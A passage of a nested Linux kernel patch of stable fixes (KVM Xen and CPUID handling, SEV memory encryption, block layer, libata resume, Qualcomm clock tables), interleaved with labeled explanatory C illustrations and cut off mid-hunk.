+ 		union cpuid10_eax eax;
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index edcf45e312b99..bfeafe4855528 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -40,6 +40,7 @@
+ #include "ioapic.h"
+ #include "trace.h"
+ #include "x86.h"
++#include "xen.h"
+ #include "cpuid.h"
+ #include "hyperv.h"
+ 
+@@ -338,8 +339,10 @@ static inline void apic_set_spiv(struct kvm_lapic *apic, u32 val)
+ 	}
+ 
+ 	/* Check if there are APF page ready requests pending */
+-	if (enabled)
++	if (enabled) {
+ 		kvm_make_request(KVM_REQ_APF_READY, apic->vcpu);
++		kvm_xen_sw_enable_lapic(apic->vcpu);
++	}
+ }
+ 
+ static inline void kvm_apic_set_xapic_id(struct kvm_lapic *apic, u8 id)
+diff --git a/arch/x86/kvm/reverse_cpuid.h b/arch/x86/kvm/reverse_cpuid.h
+index 7eeade35a425b..7c8e2b20a13b0 100644
+--- a/arch/x86/kvm/reverse_cpuid.h
++++ b/arch/x86/kvm/reverse_cpuid.h
+@@ -7,23 +7,44 @@
+ #include <asm/cpufeatures.h>
+ 
+ /*
+- * Hardware-defined CPUID leafs that are scattered in the kernel, but need to
+- * be directly used by KVM.  Note, these word values conflict with the kernel's
+- * "bug" caps, but KVM doesn't use those.
++ * Hardware-defined CPUID leafs that are either scattered by the kernel or are
++ * unknown to the kernel, but need to be directly used by KVM.  Note, these
++ * word values conflict with the kernel's "bug" caps, but KVM doesn't use those.
+  */
+ enum kvm_only_cpuid_leafs {
+ 	CPUID_12_EAX	 = NCAPINTS,
++	CPUID_7_2_EDX,
+ 	NR_KVM_CPU_CAPS,
+ 
+ 	NKVMCAPINTS = NR_KVM_CPU_CAPS - NCAPINTS,
+ };
+ 
++/*
++ * Define a KVM-only feature flag.
++ *
++ * For features that are scattered by cpufeatures.h, __feature_translate() also
++ * needs to be updated to translate the kernel-defined feature into the
++ * KVM-defined feature.
++ *
++ * For features that are 100% KVM-only, i.e. not defined by cpufeatures.h,
++ * forgo the intermediate KVM_X86_FEATURE and directly define X86_FEATURE_* so
++ * that X86_FEATURE_* can be used in KVM.  No __feature_translate() handling is
++ * needed in this case.
++ */
+ #define KVM_X86_FEATURE(w, f)		((w)*32 + (f))
+ 
+ /* Intel-defined SGX sub-features, CPUID level 0x12 (EAX). */
+ #define KVM_X86_FEATURE_SGX1		KVM_X86_FEATURE(CPUID_12_EAX, 0)
+ #define KVM_X86_FEATURE_SGX2		KVM_X86_FEATURE(CPUID_12_EAX, 1)
+ 
++/* Intel-defined sub-features, CPUID level 0x00000007:2 (EDX) */
++#define X86_FEATURE_INTEL_PSFD		KVM_X86_FEATURE(CPUID_7_2_EDX, 0)
++#define X86_FEATURE_IPRED_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 1)
++#define KVM_X86_FEATURE_RRSBA_CTRL	KVM_X86_FEATURE(CPUID_7_2_EDX, 2)
++#define X86_FEATURE_DDPD_U		KVM_X86_FEATURE(CPUID_7_2_EDX, 3)
++#define X86_FEATURE_BHI_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 4)
++#define X86_FEATURE_MCDT_NO		KVM_X86_FEATURE(CPUID_7_2_EDX, 5)
++
+ struct cpuid_reg {
+ 	u32 function;
+ 	u32 index;
+@@ -49,6 +70,7 @@ static const struct cpuid_reg reverse_cpuid[] = {
+ 	[CPUID_12_EAX]        = {0x00000012, 0, CPUID_EAX},
+ 	[CPUID_8000_001F_EAX] = {0x8000001f, 0, CPUID_EAX},
+ 	[CPUID_8000_0021_EAX] = {0x80000021, 0, CPUID_EAX},
++	[CPUID_7_2_EDX]       = {         7, 2, CPUID_EDX},
+ };
+ 
+ /*
+@@ -75,12 +97,16 @@ static __always_inline void reverse_cpuid_check(unsigned int x86_leaf)
+  */
+ static __always_inline u32 __feature_translate(int x86_feature)
+ {
+-	if (x86_feature == X86_FEATURE_SGX1)
+-		return KVM_X86_FEATURE_SGX1;
+-	else if (x86_feature == X86_FEATURE_SGX2)
+-		return KVM_X86_FEATURE_SGX2;
++#define KVM_X86_TRANSLATE_FEATURE(f)	\
++	case X86_FEATURE_##f: return KVM_X86_FEATURE_##f
+ 
+-	return x86_feature;
++	switch (x86_feature) {
++	KVM_X86_TRANSLATE_FEATURE(SGX1);
++	KVM_X86_TRANSLATE_FEATURE(SGX2);
++	KVM_X86_TRANSLATE_FEATURE(RRSBA_CTRL);
++	default:
++		return x86_feature;
++	}
+ }
+ 
+ static __always_inline u32 __feature_leaf(int x86_feature)
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 3060fe4e9731a..3dc0ee1fe9db9 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1958,20 +1958,22 @@ int sev_mem_enc_register_region(struct kvm *kvm,
+ 		goto e_free;
+ 	}
+ 
+-	region->uaddr = range->addr;
+-	region->size = range->size;
+-
+-	list_add_tail(&region->list, &sev->regions_list);
+-	mutex_unlock(&kvm->lock);
+-
+ 	/*
+ 	 * The guest may change the memory encryption attribute from C=0 -> C=1
+ 	 * or vice versa for this memory range. Let's make sure caches are
+ 	 * flushed to ensure that guest data gets written into memory with
+-	 * correct C-bit.
++	 * correct C-bit.  Note, this must be done before dropping kvm->lock,
++	 * as region and its array of pages can be freed by a different task
++	 * once kvm->lock is released.
+ 	 */
+ 	sev_clflush_pages(region->pages, region->npages);
+ 
++	region->uaddr = range->addr;
++	region->size = range->size;
++
++	list_add_tail(&region->list, &sev->regions_list);
++	mutex_unlock(&kvm->lock);
++
+ 	return ret;
+ 
+ e_free:
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 688bc7b72eb66..0e6e63a8f0949 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -7758,6 +7758,16 @@ static int emulator_cmpxchg_emulated(struct x86_emulate_ctxt *ctxt,
+ 
+ 	if (r < 0)
+ 		return X86EMUL_UNHANDLEABLE;
++
++	/*
++	 * Mark the page dirty _before_ checking whether or not the CMPXCHG was
++	 * successful, as the old value is written back on failure.  Note, for
++	 * live migration, this is unnecessarily conservative as CMPXCHG writes
++	 * back the original value and the access is atomic, but KVM's ABI is
++	 * that all writes are dirty logged, regardless of the value written.
++	 */
++	kvm_vcpu_mark_page_dirty(vcpu, gpa_to_gfn(gpa));
++
+ 	if (r)
+ 		return X86EMUL_CMPXCHG_FAILED;
+ 
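[Illustration, not part of the patch: the comment in the hunk above rests on an x86 detail worth seeing concretely. LOCK CMPXCHG performs a locked write to its destination even when the comparison fails (the old value is written back), so the guest page is written either way. A small user-space demonstration, x86-64 only:]

#include <stdint.h>
#include <stdio.h>

/* Returns 1 on success; on failure the destination still receives a
 * locked write cycle (its old value is written back). */
static int cmpxchg32(uint32_t *ptr, uint32_t old, uint32_t new)
{
	uint32_t prev;

	__asm__ __volatile__("lock cmpxchgl %2, %1"
			     : "=a" (prev), "+m" (*ptr)
			     : "r" (new), "0" (old)
			     : "memory");
	return prev == old;
}

int main(void)
{
	uint32_t v = 5;

	printf("success=%d v=%u\n", cmpxchg32(&v, 4, 9), v); /* 0, v stays 5 */
	printf("success=%d v=%u\n", cmpxchg32(&v, 5, 9), v); /* 1, v becomes 9 */
	return 0;
}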
+diff --git a/arch/x86/kvm/xen.c b/arch/x86/kvm/xen.c
+index a58a426e6b1c0..684a39df60d9e 100644
+--- a/arch/x86/kvm/xen.c
++++ b/arch/x86/kvm/xen.c
+@@ -314,7 +314,7 @@ void kvm_xen_update_runstate_guest(struct kvm_vcpu *v, int state)
+ 	mark_page_dirty_in_slot(v->kvm, gpc->memslot, gpc->gpa >> PAGE_SHIFT);
+ }
+ 
+-static void kvm_xen_inject_vcpu_vector(struct kvm_vcpu *v)
++void kvm_xen_inject_vcpu_vector(struct kvm_vcpu *v)
+ {
+ 	struct kvm_lapic_irq irq = { };
+ 	int r;
+diff --git a/arch/x86/kvm/xen.h b/arch/x86/kvm/xen.h
+index 532a535a9e99f..500d9593a5a38 100644
+--- a/arch/x86/kvm/xen.h
++++ b/arch/x86/kvm/xen.h
+@@ -16,6 +16,7 @@ extern struct static_key_false_deferred kvm_xen_enabled;
+ 
+ int __kvm_xen_has_interrupt(struct kvm_vcpu *vcpu);
+ void kvm_xen_inject_pending_events(struct kvm_vcpu *vcpu);
++void kvm_xen_inject_vcpu_vector(struct kvm_vcpu *vcpu);
+ int kvm_xen_vcpu_set_attr(struct kvm_vcpu *vcpu, struct kvm_xen_vcpu_attr *data);
+ int kvm_xen_vcpu_get_attr(struct kvm_vcpu *vcpu, struct kvm_xen_vcpu_attr *data);
+ int kvm_xen_hvm_set_attr(struct kvm *kvm, struct kvm_xen_hvm_attr *data);
+@@ -33,6 +34,19 @@ int kvm_xen_setup_evtchn(struct kvm *kvm,
+ 			 struct kvm_kernel_irq_routing_entry *e,
+ 			 const struct kvm_irq_routing_entry *ue);
+ 
++static inline void kvm_xen_sw_enable_lapic(struct kvm_vcpu *vcpu)
++{
++	/*
++	 * The local APIC is being enabled. If the per-vCPU upcall vector is
++	 * set and the vCPU's evtchn_upcall_pending flag is set, inject the
++	 * interrupt.
++	 */
++	if (static_branch_unlikely(&kvm_xen_enabled.key) &&
++	    vcpu->arch.xen.vcpu_info_cache.active &&
++	    vcpu->arch.xen.upcall_vector && __kvm_xen_has_interrupt(vcpu))
++		kvm_xen_inject_vcpu_vector(vcpu);
++}
++
+ static inline bool kvm_xen_msr_enabled(struct kvm *kvm)
+ {
+ 	return static_branch_unlikely(&kvm_xen_enabled.key) &&
+@@ -98,6 +112,10 @@ static inline void kvm_xen_destroy_vcpu(struct kvm_vcpu *vcpu)
+ {
+ }
+ 
++static inline void kvm_xen_sw_enable_lapic(struct kvm_vcpu *vcpu)
++{
++}
++
+ static inline bool kvm_xen_msr_enabled(struct kvm *kvm)
+ {
+ 	return false;
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index 3e93af083e037..d4957eefef267 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -513,6 +513,24 @@ void __init sme_early_init(void)
+ 	 */
+ 	if (sev_status & MSR_AMD64_SEV_ENABLED)
+ 		ia32_disable();
++
++	/*
++	 * Override init functions that scan the ROM region in SEV-SNP guests,
++	 * as this memory is not pre-validated and would thus cause a crash.
++	 */
++	if (sev_status & MSR_AMD64_SEV_SNP_ENABLED) {
++		x86_init.mpparse.find_smp_config = x86_init_noop;
++		x86_init.pci.init_irq = x86_init_noop;
++		x86_init.resources.probe_roms = x86_init_noop;
++
++		/*
++		 * DMI setup behavior for SEV-SNP guests depends on
++		 * efi_enabled(EFI_CONFIG_TABLES), which hasn't been
++		 * parsed yet. snp_dmi_setup() will run after that
++		 * parsing has happened.
++		 */
++		x86_init.resources.dmi_setup = snp_dmi_setup;
++	}
+ }
+ 
+ void __init mem_encrypt_free_decrypted_mem(void)
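[Illustration, not part of the patch: a stand-alone model of the x86_init ops-override pattern the hunk above relies on. Early platform detection repoints entries in a table of safe defaults before generic boot code calls through it. The names below are illustrative, not the kernel's.]

#include <stdio.h>

struct boot_ops {
	void (*dmi_setup)(void);
	void (*probe_roms)(void);
};

static void default_dmi_setup(void)   { puts("dmi_setup: default"); }
static void snp_dmi_setup_model(void) { puts("dmi_setup: guarded for SNP"); }
static void default_probe_roms(void)  { puts("probe_roms: default"); }
static void noop(void)                { /* hook skipped entirely */ }

static struct boot_ops ops = {
	.dmi_setup  = default_dmi_setup,
	.probe_roms = default_probe_roms,
};

int main(void)
{
	int snp_guest = 1;   /* pretend SEV-SNP was detected early */

	if (snp_guest) {
		ops.probe_roms = noop;             /* ROM region unvalidated */
		ops.dmi_setup  = snp_dmi_setup_model;
	}
	ops.dmi_setup();     /* later boot code is none the wiser */
	ops.probe_roms();
	return 0;
}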
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index a11a6ebbf5ecf..06ccbd36e8dcd 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -97,7 +97,6 @@ static char sme_workarea[2 * PMD_PAGE_SIZE] __section(".init.scratch");
+ 
+ static char sme_cmdline_arg[] __initdata = "mem_encrypt";
+ static char sme_cmdline_on[]  __initdata = "on";
+-static char sme_cmdline_off[] __initdata = "off";
+ 
+ static void __init sme_clear_pgd(struct sme_populate_pgd_data *ppd)
+ {
+@@ -305,7 +304,8 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 	 * instrumentation or checking boot_cpu_data in the cc_platform_has()
+ 	 * function.
+ 	 */
+-	if (!sme_get_me_mask() || sev_status & MSR_AMD64_SEV_ENABLED)
++	if (!sme_get_me_mask() ||
++	    RIP_REL_REF(sev_status) & MSR_AMD64_SEV_ENABLED)
+ 		return;
+ 
+ 	/*
+@@ -504,7 +504,7 @@ void __init sme_encrypt_kernel(struct boot_params *bp)
+ 
+ void __init sme_enable(struct boot_params *bp)
+ {
+-	const char *cmdline_ptr, *cmdline_arg, *cmdline_on, *cmdline_off;
++	const char *cmdline_ptr, *cmdline_arg, *cmdline_on;
+ 	unsigned int eax, ebx, ecx, edx;
+ 	unsigned long feature_mask;
+ 	unsigned long me_mask;
+@@ -542,11 +542,11 @@ void __init sme_enable(struct boot_params *bp)
+ 	me_mask = 1UL << (ebx & 0x3f);
+ 
+ 	/* Check the SEV MSR whether SEV or SME is enabled */
+-	sev_status   = __rdmsr(MSR_AMD64_SEV);
+-	feature_mask = (sev_status & MSR_AMD64_SEV_ENABLED) ? AMD_SEV_BIT : AMD_SME_BIT;
++	RIP_REL_REF(sev_status) = msr = __rdmsr(MSR_AMD64_SEV);
++	feature_mask = (msr & MSR_AMD64_SEV_ENABLED) ? AMD_SEV_BIT : AMD_SME_BIT;
+ 
+ 	/* The SEV-SNP CC blob should never be present unless SEV-SNP is enabled. */
+-	if (snp && !(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++	if (snp && !(msr & MSR_AMD64_SEV_SNP_ENABLED))
+ 		snp_abort();
+ 
+ 	/* Check if memory encryption is enabled */
+@@ -572,7 +572,6 @@ void __init sme_enable(struct boot_params *bp)
+ 			return;
+ 	} else {
+ 		/* SEV state cannot be controlled by a command line option */
+-		sme_me_mask = me_mask;
+ 		goto out;
+ 	}
+ 
+@@ -587,28 +586,17 @@ void __init sme_enable(struct boot_params *bp)
+ 	asm ("lea sme_cmdline_on(%%rip), %0"
+ 	     : "=r" (cmdline_on)
+ 	     : "p" (sme_cmdline_on));
+-	asm ("lea sme_cmdline_off(%%rip), %0"
+-	     : "=r" (cmdline_off)
+-	     : "p" (sme_cmdline_off));
+-
+-	if (IS_ENABLED(CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT))
+-		sme_me_mask = me_mask;
+ 
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+-	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
+-		goto out;
+-
+-	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+-		sme_me_mask = me_mask;
+-	else if (!strncmp(buffer, cmdline_off, sizeof(buffer)))
+-		sme_me_mask = 0;
++	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0 ||
++	    strncmp(buffer, cmdline_on, sizeof(buffer)))
++		return;
+ 
+ out:
+-	if (sme_me_mask) {
+-		physical_mask &= ~sme_me_mask;
+-		cc_set_vendor(CC_VENDOR_AMD);
+-		cc_set_mask(sme_me_mask);
+-	}
++	RIP_REL_REF(sme_me_mask) = me_mask;
++	physical_mask &= ~me_mask;
++	cc_vendor = CC_VENDOR_AMD;
++	cc_set_mask(me_mask);
+ }
+diff --git a/block/bio.c b/block/bio.c
+index 74c2818c7ec99..3318e0022fdfd 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -1112,19 +1112,16 @@ void __bio_release_pages(struct bio *bio, bool mark_dirty)
+ 	struct folio_iter fi;
+ 
+ 	bio_for_each_folio_all(fi, bio) {
+-		struct page *page;
+-		size_t done = 0;
++		size_t nr_pages;
+ 
+ 		if (mark_dirty) {
+ 			folio_lock(fi.folio);
+ 			folio_mark_dirty(fi.folio);
+ 			folio_unlock(fi.folio);
+ 		}
+-		page = folio_page(fi.folio, fi.offset / PAGE_SIZE);
+-		do {
+-			folio_put(fi.folio);
+-			done += PAGE_SIZE;
+-		} while (done < fi.length);
++		nr_pages = (fi.offset + fi.length - 1) / PAGE_SIZE -
++			   fi.offset / PAGE_SIZE + 1;
++		folio_put_refs(fi.folio, nr_pages);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(__bio_release_pages);
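[Illustration, not part of the patch: the page-count arithmetic introduced above, worked as a stand-alone example. The span [offset, offset + length) is converted to a number of pages by indexing its first and last byte.]

#include <stdio.h>
#define PAGE_SIZE 4096UL

/* Number of pages spanned by [offset, offset + length) in a folio. */
static unsigned long span_pages(unsigned long offset, unsigned long length)
{
	return (offset + length - 1) / PAGE_SIZE - offset / PAGE_SIZE + 1;
}

int main(void)
{
	/* 8192 bytes starting at byte 1024 touch pages 0, 1 and 2. */
	printf("%lu\n", span_pages(1024, 8192));   /* prints 3 */
	return 0;
}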
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 7ed6b9469f979..e1b12f3d54bd4 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -675,6 +675,22 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ }
+ EXPORT_SYMBOL_GPL(blk_mq_alloc_request_hctx);
+ 
++static void blk_mq_finish_request(struct request *rq)
++{
++	struct request_queue *q = rq->q;
++
++	if ((rq->rq_flags & RQF_ELVPRIV) &&
++	    q->elevator->type->ops.finish_request) {
++		q->elevator->type->ops.finish_request(rq);
++		/*
++		 * For a postflush request that may need to be
++		 * completed twice, we should clear this flag
++		 * to avoid double finish_request() on the rq.
++		 */
++		rq->rq_flags &= ~RQF_ELVPRIV;
++	}
++}
++
+ static void __blk_mq_free_request(struct request *rq)
+ {
+ 	struct request_queue *q = rq->q;
+@@ -701,9 +717,7 @@ void blk_mq_free_request(struct request *rq)
+ {
+ 	struct request_queue *q = rq->q;
+ 
+-	if ((rq->rq_flags & RQF_ELVPRIV) &&
+-	    q->elevator->type->ops.finish_request)
+-		q->elevator->type->ops.finish_request(rq);
++	blk_mq_finish_request(rq);
+ 
+ 	if (unlikely(laptop_mode && !blk_rq_is_passthrough(rq)))
+ 		laptop_io_completion(q->disk->bdi);
+@@ -747,16 +761,11 @@ static void req_bio_endio(struct request *rq, struct bio *bio,
+ 		/*
+ 		 * Partial zone append completions cannot be supported as the
+ 		 * BIO fragments may end up not being written sequentially.
+-		 * For such case, force the completed nbytes to be equal to
+-		 * the BIO size so that bio_advance() sets the BIO remaining
+-		 * size to 0 and we end up calling bio_endio() before returning.
+ 		 */
+-		if (bio->bi_iter.bi_size != nbytes) {
++		if (bio->bi_iter.bi_size != nbytes)
+ 			bio->bi_status = BLK_STS_IOERR;
+-			nbytes = bio->bi_iter.bi_size;
+-		} else {
++		else
+ 			bio->bi_iter.bi_sector = rq->__sector;
+-		}
+ 	}
+ 
+ 	bio_advance(bio, nbytes);
+@@ -1025,6 +1034,8 @@ inline void __blk_mq_end_request(struct request *rq, blk_status_t error)
+ 	if (blk_mq_need_time_stamp(rq))
+ 		__blk_mq_end_request_acct(rq, ktime_get_ns());
+ 
++	blk_mq_finish_request(rq);
++
+ 	if (rq->end_io) {
+ 		rq_qos_done(rq->q, rq);
+ 		if (rq->end_io(rq, error) == RQ_END_IO_FREE)
+@@ -1079,6 +1090,8 @@ void blk_mq_end_request_batch(struct io_comp_batch *iob)
+ 		if (iob->need_ts)
+ 			__blk_mq_end_request_acct(rq, now);
+ 
++		blk_mq_finish_request(rq);
++
+ 		rq_qos_done(rq->q, rq);
+ 
+ 		/*
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index bbca4ce77a2d3..c702f408bbc0a 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -680,6 +680,10 @@ int blk_stack_limits(struct queue_limits *t, struct queue_limits *b,
+ 	t->zone_write_granularity = max(t->zone_write_granularity,
+ 					b->zone_write_granularity);
+ 	t->zoned = max(t->zoned, b->zoned);
++	if (!t->zoned) {
++		t->zone_write_granularity = 0;
++		t->max_zone_append_sectors = 0;
++	}
+ 	return ret;
+ }
+ EXPORT_SYMBOL(blk_stack_limits);
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index 55e26065c2e27..f10c2a0d18d41 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -622,9 +622,8 @@ static void dd_depth_updated(struct blk_mq_hw_ctx *hctx)
+ 	struct request_queue *q = hctx->queue;
+ 	struct deadline_data *dd = q->elevator->elevator_data;
+ 	struct blk_mq_tags *tags = hctx->sched_tags;
+-	unsigned int shift = tags->bitmap_tags.sb.shift;
+ 
+-	dd->async_depth = max(1U, 3 * (1U << shift)  / 4);
++	dd->async_depth = max(1UL, 3 * q->nr_requests / 4);
+ 
+ 	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, dd->async_depth);
+ }
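[Illustration, not part of the patch: the new async_depth value above is plain arithmetic on the queue depth rather than on the internal sbitmap word shift. A minimal sketch:]

/* 3/4 of the queue depth, floored at 1. */
static unsigned long async_depth(unsigned long nr_requests)
{
	unsigned long d = 3 * nr_requests / 4;

	return d ? d : 1;	/* e.g. nr_requests = 64 gives 48 */
}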
+diff --git a/drivers/accessibility/speakup/synth.c b/drivers/accessibility/speakup/synth.c
+index eea2a2fa4f015..45f9061031338 100644
+--- a/drivers/accessibility/speakup/synth.c
++++ b/drivers/accessibility/speakup/synth.c
+@@ -208,8 +208,10 @@ void spk_do_flush(void)
+ 	wake_up_process(speakup_task);
+ }
+ 
+-void synth_write(const char *buf, size_t count)
++void synth_write(const char *_buf, size_t count)
+ {
++	const unsigned char *buf = (const unsigned char *) _buf;
++
+ 	while (count--)
+ 		synth_buffer_add(*buf++);
+ 	synth_start();
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 1790a2ecb9fac..17119e8dc8c30 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -671,11 +671,6 @@ MODULE_PARM_DESC(mobile_lpm_policy, "Default LPM policy for mobile chipsets");
+ static void ahci_pci_save_initial_config(struct pci_dev *pdev,
+ 					 struct ahci_host_priv *hpriv)
+ {
+-	if (pdev->vendor == PCI_VENDOR_ID_ASMEDIA && pdev->device == 0x1166) {
+-		dev_info(&pdev->dev, "ASM1166 has only six ports\n");
+-		hpriv->saved_port_map = 0x3f;
+-	}
+-
+ 	if (pdev->vendor == PCI_VENDOR_ID_JMICRON && pdev->device == 0x2361) {
+ 		dev_info(&pdev->dev, "JMB361 has only one port\n");
+ 		hpriv->saved_port_map = 1;
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 1eaaf01418ea7..b8034d194078d 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -711,8 +711,10 @@ void ata_scsi_port_error_handler(struct Scsi_Host *host, struct ata_port *ap)
+ 					ehc->saved_ncq_enabled |= 1 << devno;
+ 
+ 				/* If we are resuming, wake up the device */
+-				if (ap->pflags & ATA_PFLAG_RESUMING)
++				if (ap->pflags & ATA_PFLAG_RESUMING) {
++					dev->flags |= ATA_DFLAG_RESUMING;
+ 					ehc->i.dev_action[devno] |= ATA_EH_SET_ACTIVE;
++				}
+ 			}
+ 		}
+ 
+@@ -3089,6 +3091,7 @@ static int ata_eh_revalidate_and_attach(struct ata_link *link,
+ 	return 0;
+ 
+  err:
++	dev->flags &= ~ATA_DFLAG_RESUMING;
+ 	*r_failed_dev = dev;
+ 	return rc;
+ }
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index a9da2f05e6297..a09548630fc8b 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -4652,6 +4652,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 	struct ata_link *link;
+ 	struct ata_device *dev;
+ 	unsigned long flags;
++	bool do_resume;
+ 	int ret = 0;
+ 
+ 	mutex_lock(&ap->scsi_scan_mutex);
+@@ -4673,7 +4674,15 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			if (scsi_device_get(sdev))
+ 				continue;
+ 
++			do_resume = dev->flags & ATA_DFLAG_RESUMING;
++
+ 			spin_unlock_irqrestore(ap->lock, flags);
++			if (do_resume) {
++				ret = scsi_resume_device(sdev);
++				if (ret == -EWOULDBLOCK)
++					goto unlock;
++				dev->flags &= ~ATA_DFLAG_RESUMING;
++			}
+ 			ret = scsi_rescan_device(sdev);
+ 			scsi_device_put(sdev);
+ 			spin_lock_irqsave(ap->lock, flags);
+diff --git a/drivers/base/power/wakeirq.c b/drivers/base/power/wakeirq.c
+index afd094dec5ca3..ca0c092ba47fb 100644
+--- a/drivers/base/power/wakeirq.c
++++ b/drivers/base/power/wakeirq.c
+@@ -362,8 +362,10 @@ void dev_pm_enable_wake_irq_complete(struct device *dev)
+ 		return;
+ 
+ 	if (wirq->status & WAKE_IRQ_DEDICATED_MANAGED &&
+-	    wirq->status & WAKE_IRQ_DEDICATED_REVERSE)
++	    wirq->status & WAKE_IRQ_DEDICATED_REVERSE) {
+ 		enable_irq(wirq->irq);
++		wirq->status |= WAKE_IRQ_DEDICATED_ENABLED;
++	}
+ }
+ 
+ /**
+diff --git a/drivers/clk/qcom/gcc-ipq6018.c b/drivers/clk/qcom/gcc-ipq6018.c
+index 4c5c7a8f41d08..b9844e41cf99d 100644
+--- a/drivers/clk/qcom/gcc-ipq6018.c
++++ b/drivers/clk/qcom/gcc-ipq6018.c
+@@ -1557,6 +1557,7 @@ static struct clk_regmap_div nss_ubi0_div_clk_src = {
+ 
+ static const struct freq_tbl ftbl_pcie_aux_clk_src[] = {
+ 	F(24000000, P_XO, 1, 0, 0),
++	{ }
+ };
+ 
+ static const struct clk_parent_data gcc_xo_gpll0_core_pi_sleep_clk[] = {
+@@ -1737,6 +1738,7 @@ static const struct freq_tbl ftbl_sdcc_ice_core_clk_src[] = {
+ 	F(160000000, P_GPLL0, 5, 0, 0),
+ 	F(216000000, P_GPLL6, 5, 0, 0),
+ 	F(308570000, P_GPLL6, 3.5, 0, 0),
++	{ }
+ };
+ 
+ static const struct clk_parent_data gcc_xo_gpll0_gpll6_gpll0_div2[] = {
+diff --git a/drivers/clk/qcom/gcc-ipq8074.c b/drivers/clk/qcom/gcc-ipq8074.c
+index b2e83b38976e5..b52c923a2fbca 100644
+--- a/drivers/clk/qcom/gcc-ipq8074.c
++++ b/drivers/clk/qcom/gcc-ipq8074.c
+@@ -973,6 +973,7 @@ static struct clk_rcg2 pcie0_axi_clk_src = {
+ 
+ static const struct freq_tbl ftbl_pcie_aux_clk_src[] = {
+ 	F(19200000, P_XO, 1, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 pcie0_aux_clk_src = {
+@@ -1078,6 +1079,7 @@ static const struct freq_tbl ftbl_sdcc_ice_core_clk_src[] = {
+ 	F(19200000, P_XO, 1, 0, 0),
+ 	F(160000000, P_GPLL0, 5, 0, 0),
+ 	F(308570000, P_GPLL6, 3.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 sdcc1_ice_core_clk_src = {
+diff --git a/drivers/clk/qcom/gcc-sdm845.c b/drivers/clk/qcom/gcc-sdm845.c
+index 6af08e0ca8475..ef15e8f114027 100644
+--- a/drivers/clk/qcom/gcc-sdm845.c
++++ b/drivers/clk/qcom/gcc-sdm845.c
+@@ -4038,3 +4038,4 @@ module_exit(gcc_sdm845_exit);
+ MODULE_DESCRIPTION("QTI GCC SDM845 Driver");
+ MODULE_LICENSE("GPL v2");
+ MODULE_ALIAS("platform:gcc-sdm845");
++MODULE_SOFTDEP("pre: rpmhpd");
+diff --git a/drivers/clk/qcom/mmcc-apq8084.c b/drivers/clk/qcom/mmcc-apq8084.c
+index e9f9713591558..5f373c10ec6ee 100644
+--- a/drivers/clk/qcom/mmcc-apq8084.c
++++ b/drivers/clk/qcom/mmcc-apq8084.c
+@@ -334,6 +334,7 @@ static struct freq_tbl ftbl_mmss_axi_clk[] = {
+ 	F(333430000, P_MMPLL1, 3.5, 0, 0),
+ 	F(400000000, P_MMPLL0, 2, 0, 0),
+ 	F(466800000, P_MMPLL1, 2.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 mmss_axi_clk_src = {
+@@ -358,6 +359,7 @@ static struct freq_tbl ftbl_ocmemnoc_clk[] = {
+ 	F(150000000, P_GPLL0, 4, 0, 0),
+ 	F(228570000, P_MMPLL0, 3.5, 0, 0),
+ 	F(320000000, P_MMPLL0, 2.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 ocmemnoc_clk_src = {
+diff --git a/drivers/clk/qcom/mmcc-msm8974.c b/drivers/clk/qcom/mmcc-msm8974.c
+index 17ed52046170a..eb2b0e2200d23 100644
+--- a/drivers/clk/qcom/mmcc-msm8974.c
++++ b/drivers/clk/qcom/mmcc-msm8974.c
+@@ -279,6 +279,7 @@ static struct freq_tbl ftbl_mmss_axi_clk[] = {
+ 	F(291750000, P_MMPLL1, 4, 0, 0),
